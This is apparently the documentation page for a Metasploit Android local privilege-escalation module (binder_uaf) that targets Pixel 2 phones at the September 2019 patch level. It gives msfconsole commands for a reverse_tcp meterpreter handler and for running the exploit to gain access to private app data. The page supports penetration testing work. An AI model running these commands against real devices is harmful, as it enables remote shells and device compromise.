## Vulnerable Application

This exploit module currently targets a very specific build of Android on specific set of hardware targets:

 - Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.

This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.

One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.

## Verification Steps

 - Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:

 `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`

 - Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:

```
uname -a
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
```

 - Run the exploit:

```
msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
LPORT => 4448
msf5 exploit(android/local/binder_uaf) > set SESSION -1
SESSION => -1
msf5 exploit(android/local/binder_uaf) > run
```

 - **Verify** the new session can read and write private application data (in /data/data/..../)

## Scenarios

This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
